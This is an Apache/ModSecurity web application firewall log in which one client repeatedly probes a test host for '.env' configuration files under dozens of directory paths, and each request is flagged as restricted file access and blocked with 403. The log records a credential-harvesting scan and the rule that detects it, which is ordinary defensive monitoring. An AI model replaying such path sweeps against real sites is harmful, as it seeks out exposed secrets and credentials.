[Mon Jan 12 12:28:24.176076 2026] [:error] [pid 1355923] [client 13.40.27.204:43050] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWTa2CE1xEBhFyXickXrdAAAAAA"]
[Mon Jan 12 12:28:24.276842 2026] [:error] [pid 1355926] [client 13.40.27.204:43076] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWTa2MC2y5bYy1r2HoPzCwAAAAM"]
[Mon Jan 12 12:28:24.277023 2026] [:error] [pid 1355926] [client 13.40.27.204:43076] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWTa2MC2y5bYy1r2HoPzCwAAAAM"]
[Mon Jan 12 12:28:24.277166 2026] [:error] [pid 1355926] [client 13.40.27.204:43076] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWTa2MC2y5bYy1r2HoPzCwAAAAM"]
[Mon Jan 12 12:28:24.376100 2026] [:error] [pid 1362233] [client 13.40.27.204:43110] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWTa2H2DuVtAKraH1YONaAAAAAk"]
[Mon Jan 12 12:28:24.376288 2026] [:error] [pid 1362233] [client 13.40.27.204:43110] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWTa2H2DuVtAKraH1YONaAAAAAk"]
[Mon Jan 12 12:28:24.376440 2026] [:error] [pid 1362233] [client 13.40.27.204:43110] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWTa2H2DuVtAKraH1YONaAAAAAk"]
[Mon Jan 12 12:28:24.470219 2026] [:error] [pid 1355925] [client 13.40.27.204:43138] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWTa2E7thAymmecRvtl0MAAAAAI"]
[Mon Jan 12 12:28:24.470420 2026] [:error] [pid 1355925] [client 13.40.27.204:43138] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWTa2E7thAymmecRvtl0MAAAAAI"]
[Mon Jan 12 12:28:24.470564 2026] [:error] [pid 1355925] [client 13.40.27.204:43138] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWTa2E7thAymmecRvtl0MAAAAAI"]
[Mon Jan 12 12:28:24.572552 2026] [:error] [pid 1355924] [client 13.40.27.204:43166] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWTa2NIpinFXoPzDav5wVgAAAAE"]
[Mon Jan 12 12:28:24.572740 2026] [:error] [pid 1355924] [client 13.40.27.204:43166] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWTa2NIpinFXoPzDav5wVgAAAAE"]
[Mon Jan 12 12:28:24.572886 2026] [:error] [pid 1355924] [client 13.40.27.204:43166] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWTa2NIpinFXoPzDav5wVgAAAAE"]
[Mon Jan 12 12:28:24.681969 2026] [:error] [pid 1365300] [client 13.40.27.204:43204] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWTa2NlKlmIJBGbQbR78RwAAAAs"]
[Mon Jan 12 12:28:24.682155 2026] [:error] [pid 1365300] [client 13.40.27.204:43204] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWTa2NlKlmIJBGbQbR78RwAAAAs"]
[Mon Jan 12 12:28:24.682303 2026] [:error] [pid 1365300] [client 13.40.27.204:43204] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWTa2NlKlmIJBGbQbR78RwAAAAs"]
[Mon Jan 12 12:28:24.784586 2026] [:error] [pid 1358564] [client 13.40.27.204:43238] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWTa2B_UgGRJ4jDk47tQXAAAAAY"]
[Mon Jan 12 12:28:24.784765 2026] [:error] [pid 1358564] [client 13.40.27.204:43238] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWTa2B_UgGRJ4jDk47tQXAAAAAY"]
[Mon Jan 12 12:28:24.784914 2026] [:error] [pid 1358564] [client 13.40.27.204:43238] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aWTa2B_UgGRJ4jDk47tQXAAAAAY"]
[Mon Jan 12 12:28:24.881671 2026] [:error] [pid 1362231] [client 13.40.27.204:43276] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWTa2MuCkgRo958sQERiBwAAAAc"]
[Mon Jan 12 12:28:24.881847 2026] [:error] [pid 1362231] [client 13.40.27.204:43276] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWTa2MuCkgRo958sQERiBwAAAAc"]
[Mon Jan 12 12:28:24.881991 2026] [:error] [pid 1362231] [client 13.40.27.204:43276] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWTa2MuCkgRo958sQERiBwAAAAc"]
[Mon Jan 12 12:28:24.974617 2026] [:error] [pid 1356126] [client 13.40.27.204:43308] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWTa2Dv8xyMiuvwfNnljwQAAAAU"]
[Mon Jan 12 12:28:24.974803 2026] [:error] [pid 1356126] [client 13.40.27.204:43308] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWTa2Dv8xyMiuvwfNnljwQAAAAU"]
[Mon Jan 12 12:28:24.974955 2026] [:error] [pid 1356126] [client 13.40.27.204:43308] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWTa2Dv8xyMiuvwfNnljwQAAAAU"]
[Mon Jan 12 12:28:25.065714 2026] [:error] [pid 1355923] [client 13.40.27.204:43336] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdQAAAAA"]
[Mon Jan 12 12:28:25.065902 2026] [:error] [pid 1355923] [client 13.40.27.204:43336] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdQAAAAA"]
[Mon Jan 12 12:28:25.066057 2026] [:error] [pid 1355923] [client 13.40.27.204:43336] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWTa2SE1xEBhFyXickXrdQAAAAA"]
[Mon Jan 12 12:28:25.161800 2026] [:error] [pid 1355926] [client 13.40.27.204:43360] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWTa2cC2y5bYy1r2HoPzDAAAAAM"]
[Mon Jan 12 12:28:25.162009 2026] [:error] [pid 1355926] [client 13.40.27.204:43360] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWTa2cC2y5bYy1r2HoPzDAAAAAM"]
[Mon Jan 12 12:28:25.162167 2026] [:error] [pid 1355926] [client 13.40.27.204:43360] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWTa2cC2y5bYy1r2HoPzDAAAAAM"]
[Mon Jan 12 12:28:25.263149 2026] [:error] [pid 1362233] [client 13.40.27.204:43388] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWTa2X2DuVtAKraH1YONaQAAAAk"]
[Mon Jan 12 12:28:25.263369 2026] [:error] [pid 1362233] [client 13.40.27.204:43388] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWTa2X2DuVtAKraH1YONaQAAAAk"]
[Mon Jan 12 12:28:25.263543 2026] [:error] [pid 1362233] [client 13.40.27.204:43388] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWTa2X2DuVtAKraH1YONaQAAAAk"]
[Mon Jan 12 12:28:25.366220 2026] [:error] [pid 1355925] [client 13.40.27.204:43422] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWTa2U7thAymmecRvtl0MQAAAAI"]
[Mon Jan 12 12:28:25.366447 2026] [:error] [pid 1355925] [client 13.40.27.204:43422] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWTa2U7thAymmecRvtl0MQAAAAI"]
[Mon Jan 12 12:28:25.366603 2026] [:error] [pid 1355925] [client 13.40.27.204:43422] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWTa2U7thAymmecRvtl0MQAAAAI"]
[Mon Jan 12 12:28:25.465523 2026] [:error] [pid 1355924] [client 13.40.27.204:43456] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWTa2dIpinFXoPzDav5wVwAAAAE"]
[Mon Jan 12 12:28:25.465723 2026] [:error] [pid 1355924] [client 13.40.27.204:43456] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWTa2dIpinFXoPzDav5wVwAAAAE"]
[Mon Jan 12 12:28:25.465872 2026] [:error] [pid 1355924] [client 13.40.27.204:43456] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWTa2dIpinFXoPzDav5wVwAAAAE"]
